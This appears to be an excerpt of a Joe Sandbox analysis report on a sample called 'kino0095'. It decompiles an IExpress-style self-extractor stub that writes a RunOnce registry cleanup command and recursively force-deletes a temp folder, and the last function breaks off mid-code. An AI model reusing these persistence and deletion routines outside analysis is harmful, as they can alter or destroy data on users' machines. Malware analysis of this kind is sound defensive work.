• Instruction Fuzzy Hash: 2C410B30A202068AEB71AB399CD56DA77FCFF44744F2041A9FAC1D6145EB7AC980CB60
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 86%
// Decompiler output (Joe Sandbox IDA plugin, quality 86%), reproduced as
// generated. Editor comments (//) describe what the routine does; the field
// names the decompiler attached to the WIN32_FIND_DATAA slots are unreliable
// (the struct is referenced through two overlapping stack names, _v604 and
// _v596), so they are read below by intent rather than by label.
//
// Behaviour: recursive directory-tree deletion. The routine enumerates
// __ecx\* with FindFirstFileA/FindNextFileA, clears attributes and deletes
// each file, recurses into each subdirectory (skipping "." and ".."), then
// removes the now-empty directory with RemoveDirectoryA.
E010B2390(CHAR* __ecx) {
	signed int _v8;
	char _v276;                       // path buffer (MAX_PATH); _v280/_v284 below
	char _v280;                       // appear to be the same buffer referenced at
	char _v284;                       // slightly different stack offsets
	struct _WIN32_FIND_DATAA _v596;   // overlapping names for one find-data record
	struct _WIN32_FIND_DATAA _v604;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t21;
	int _t36;
	void* _t46;
	void* _t62;
	void* _t63;
	CHAR* _t65;
	void* _t66;
	signed int _t67;
	signed int _t69;

	_t69 = (_t67 & 0xfffffff8) - 0x254;
	_t21 =  *0x10b8004; // 0x72151d89  (stack-cookie seed, /GS security cookie)
	_t22 = _t21 ^ _t69;
	_v8 = _t21 ^ _t69;
	_t65 = __ecx;                     // directory path to delete
	if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
		L10:
		_pop(_t62);
		_pop(_t66);
		_pop(_t46);
		return E010B6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66); // cookie check / epilogue
	} else {
		// E010B1680 / E010B16B3 behave as bounded copy / append helpers
		// (0x104 == MAX_PATH): build "<dir>*" as the search pattern.
		E010B1680( &_v276, 0x104, __ecx);
		_t58 = 0x104;
		E010B16B3( &_v280, 0x104, "*");
		_t22 = FindFirstFileA( &_v284,  &_v604); // executed
		_t63 = _t22;
		if(_t63 == 0xffffffff) {      // INVALID_HANDLE_VALUE: nothing to enumerate
			goto L10;
		} else {
			goto L3;
		}
		do {
			L3:
			_t58 = 0x104;
			E010B1680( &_v276, 0x104, _t65);                 // reset buffer to "<dir>"
			// Intent: (dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) == 0, i.e. a file.
			if((_v604.ftCreationTime & 0x00000010) == 0) {
				_t58 = 0x104;
				E010B16B3( &_v276, 0x104,  &(_v596.dwReserved1)); // append cFileName
				SetFileAttributesA( &_v280, 0x80);              // FILE_ATTRIBUTE_NORMAL: drop read-only
				DeleteFileA( &_v280);
			} else {
				// Subdirectory: skip "." and "..", otherwise recurse.
				if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
					E010B16B3( &_v276, 0x104,  &(_v596.cFileName)); // append cFileName
					_t58 = 0x104;
					E010B658A( &_v280, 0x104, 0x10b1140);           // append constant string at 0x10b1140
					E010B2390( &_v284);                             // recursive call on the subdirectory
				}
			}
			_t36 = FindNextFileA(_t63,  &_v596); // executed
		} while (_t36 != 0);
		FindClose(_t63); // executed
		_t22 = RemoveDirectoryA(_t65); // executed   // directory is empty now; remove it
		goto L10;
	}
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,010B8A3A,010B11F4,010B8A3A,00000000,?,?), ref: 010B23F6
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,010B11F8), ref: 010B2427
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,010B11FC), ref: 010B243B
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010B2495
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 010B24A3
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010B24AF
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 010B24BE
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(010B8A3A), ref: 010B24C5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                                                    • Opcode ID: da4fd9ed98f508b461b727be5b878896f74e799849818ad9835bfe107652d38f
                                                                                                                                                                                                                                    • Instruction ID: 31748d84a25a30f878f1487b5f0c5d175b177b99e4bd59d904ef248b4d4ffba5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da4fd9ed98f508b461b727be5b878896f74e799849818ad9835bfe107652d38f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 333190316046419BD330EAA8DCC9AEB77ECABC9305F04492EA5D587284EF78A9498752
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E010B2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                                                    				signed char _t19;
                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                                                    				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                    					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                                                    						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                                                    							_t17 = _t21;
                                                                                                                                                                                                                                    							 *0x10ba288(0, 1, 0, 0);
                                                                                                                                                                                                                                    							 *_t21();
                                                                                                                                                                                                                                    							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                    							if(_t24 != _t24) {
                                                                                                                                                                                                                                    								_t17 = 4;
                                                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t20 = _a12;
                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                    				 *0x10b9124 = 0;
                                                                                                                                                                                                                                    				if(E010B2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                    					_t9 = E010B2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                    					_t22 = _t9; // executed
                                                                                                                                                                                                                                    					E010B52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                    					if(_t22 != 0) {
                                                                                                                                                                                                                                    						_t32 =  *0x10b8a3a; // 0x0
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							_t19 =  *0x10b9a2c; // 0x0
                                                                                                                                                                                                                                    							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                    								E010B1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t6 =  *0x10b8588; // 0x0
                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t7 =  *0x10b9124; // 0x80070002
                                                                                                                                                                                                                                    				return _t7;
                                                                                                                                                                                                                                    			}

APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,010B6BB0,010B0000,00000000,00000002,0000000A), ref: 010B2C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,010B6BB0,010B0000,00000000,00000002,0000000A), ref: 010B2C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010B2C28
• CloseHandle.KERNEL32(00000000,?,?,010B6BB0,010B0000,00000000,00000002,0000000A), ref: 010B2C98
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: 497f54595cfb6dc7f2f32ae445383c0bd0fde7fd9ef1b83c43ff159486fed9d8
• Instruction ID: 8225e60e5048b6f737397d92c26874ec2e2425d59b683516ebb4fa225c202183
• Opcode Fuzzy Hash: 497f54595cfb6dc7f2f32ae445383c0bd0fde7fd9ef1b83c43ff159486fed9d8
• Instruction Fuzzy Hash: 1B11E97131030AABE7706BF9ACC9AE73B9D9B54394B040055FAC4E7248DB3AF842C764
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B6F40() {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E010B6EF0); // executed
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}

APIs
• SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010B6F45
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: f24509d71c54c208fcb60fb4c8d63ff68770545f0f04e3d4f86969ef37358696
• Instruction ID: 8bbf84120a62d3b3a2f9b49e7c38fee9386bf588397a7818f5a0d394a73c91b7
• Opcode Fuzzy Hash: f24509d71c54c208fcb60fb4c8d63ff68770545f0f04e3d4f86969ef37358696
• Instruction Fuzzy Hash: 149002B035110087A6601B71999949575915A4D6427815864E0A1C9448DB6654405711
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E010B202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                                                    				int _v540;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x10b8004; // 0x72151d89 (stack cookie seed)
				_v8 = _t28 ^ _t93;
				_t84 = 0x104; // MAX_PATH
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				// 0x80000002 = HKEY_LOCAL_MACHINE, 0x2001f = KEY_READ | KEY_WRITE: opens/creates the machine-wide RunOnce key
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E010B6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				// Probes "wextract_cleanup0", "wextract_cleanup1", ... until a value name that does not yet exist is found (at most 200 = 0xc8 tries)
				while(1) {
					E010B171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					// Builds "<system dir>\advpack.dll" and loads it to check for the DelNodeRunDLL32 export
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E010B658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x10b9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						// Inline strlen of the module path in _v268
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						// Inline strlen of the string at 0x10b91e4
						_t81 = 0x10b91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x10b91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10b91e5); // 0x40 = LPTR (fixed, zero-initialised)
						if(_t90 != 0) {
							 *0x10b8580 = _t66 ^ 0x00000001;
							// With DelNodeRunDLL32 available, the RunOnce command deletes the extraction directory via rundll32 + advpack.dll
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E010B171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							// Inline strlen of the formatted command line
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							// Type 1 = REG_SZ: writes the cleanup command as the RunOnce value found above
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E010B44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E010B658A( &_v268, 0x104, 0x10b1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x10b8530 = _t66;
				goto L23;
			}
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b20da
                                                                                                                                                                                                                                    0x010b20e2
                                                                                                                                                                                                                                    0x010b2103
                                                                                                                                                                                                                                    0x010b210e
                                                                                                                                                                                                                                    0x010b2116
                                                                                                                                                                                                                                    0x010b2122
                                                                                                                                                                                                                                    0x010b2128
                                                                                                                                                                                                                                    0x010b212c
                                                                                                                                                                                                                                    0x010b2179
                                                                                                                                                                                                                                    0x010b2194
                                                                                                                                                                                                                                    0x010b21de
                                                                                                                                                                                                                                    0x010b21e4
                                                                                                                                                                                                                                    0x010b2256
                                                                                                                                                                                                                                    0x010b2256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2256
                                                                                                                                                                                                                                    0x010b2196
                                                                                                                                                                                                                                    0x010b2196
                                                                                                                                                                                                                                    0x010b219c
                                                                                                                                                                                                                                    0x010b219f
                                                                                                                                                                                                                                    0x010b219f
                                                                                                                                                                                                                                    0x010b21a1
                                                                                                                                                                                                                                    0x010b21a2
                                                                                                                                                                                                                                    0x010b21a6
                                                                                                                                                                                                                                    0x010b21a8
                                                                                                                                                                                                                                    0x010b21b0
                                                                                                                                                                                                                                    0x010b21b0
                                                                                                                                                                                                                                    0x010b21b2
                                                                                                                                                                                                                                    0x010b21b3
                                                                                                                                                                                                                                    0x010b21bc
                                                                                                                                                                                                                                    0x010b21c7
                                                                                                                                                                                                                                    0x010b21cb
                                                                                                                                                                                                                                    0x010b21f1
                                                                                                                                                                                                                                    0x010b21f6
                                                                                                                                                                                                                                    0x010b21fd
                                                                                                                                                                                                                                    0x010b21ff
                                                                                                                                                                                                                                    0x010b21ff
                                                                                                                                                                                                                                    0x010b2204
                                                                                                                                                                                                                                    0x010b2213
                                                                                                                                                                                                                                    0x010b2218
                                                                                                                                                                                                                                    0x010b221d
                                                                                                                                                                                                                                    0x010b221d
                                                                                                                                                                                                                                    0x010b2220
                                                                                                                                                                                                                                    0x010b2220
                                                                                                                                                                                                                                    0x010b2222
                                                                                                                                                                                                                                    0x010b2223
                                                                                                                                                                                                                                    0x010b2229
                                                                                                                                                                                                                                    0x010b223d
                                                                                                                                                                                                                                    0x010b2249
                                                                                                                                                                                                                                    0x010b2250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2250
                                                                                                                                                                                                                                    0x010b21d2
                                                                                                                                                                                                                                    0x010b21d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b21d9
                                                                                                                                                                                                                                    0x010b213a
                                                                                                                                                                                                                                    0x010b2141
                                                                                                                                                                                                                                    0x010b2144
                                                                                                                                                                                                                                    0x010b214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2163
                                                                                                                                                                                                                                    0x010b2172
                                                                                                                                                                                                                                    0x010b2172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2163
                                                                                                                                                                                                                                    0x010b20ea
                                                                                                                                                                                                                                    0x010b20f0
                                                                                                                                                                                                                                    0x00000000

APIs
• memset.MSVCRT ref: 010B2050
• memset.MSVCRT ref: 010B205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010B208C
  • Part of subcall function 010B171E: _vsnprintf.MSVCRT ref: 010B1750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B20C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B20EA
• GetSystemDirectoryA.KERNEL32 ref: 010B2103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010B2134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2144
• GetSystemDirectoryA.KERNEL32 ref: 010B215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B21C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B21E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010B223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2250
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
• API String ID: 178549006-850274211
• Opcode ID: 2c844b7e295a000284c5f105c164e7d298c80241febeecab68bba84ccbdf07ff
• Instruction ID: 959d7ff9c199a54d1f549e7682b216867db9ef8c78183a520a13c957a8de152a
• Opcode Fuzzy Hash: 2c844b7e295a000284c5f105c164e7d298c80241febeecab68bba84ccbdf07ff
• Instruction Fuzzy Hash: FD512171A10214ABDB309F24DCC8FEB7B7CEB54740F0041A9FAC9E7145DA76AE858B60
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E010B55A0(void* __eflags) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                                                    				int _t32;
                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                    				int _t35;
                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                                                    				int _t44;
                                                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                                                    				int _t49;
                                                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                                                    				int _t59;
                                                                                                                                                                                                                                    				char _t60;
                                                                                                                                                                                                                                    				int _t65;
                                                                                                                                                                                                                                    				char _t66;
                                                                                                                                                                                                                                    				int _t67;
                                                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                                                    				int _t70;
                                                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                    				int _t73;
                                                                                                                                                                                                                                    				CHAR* _t82;
                                                                                                                                                                                                                                    				CHAR* _t88;
                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t28 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                    				_t2 = E010B468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                    					_t32 = E010B468F(_t82, _t109, 1);
                                                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                    							 *0x10b9a30 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                                                    						_t35 =  *0x10b8b3e; // 0x0
                                                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                                                    							__eflags =  *0x10b8a24; // 0x0
                                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                                                    								_t36 = E010B6517(_t82, 0x7d2, 0, E010B3210, 0, 0);
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								__eflags =  *0x10b9a30; // 0x0
                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t109 = 0x10b91e4;
                                                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0x10b91e4);
                                                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                                                    										E010B1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                    											do {
                                                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	_t68 = E010B6952( &_v268);
                                                                                                                                                                                                                                    																	__eflags = _t68;
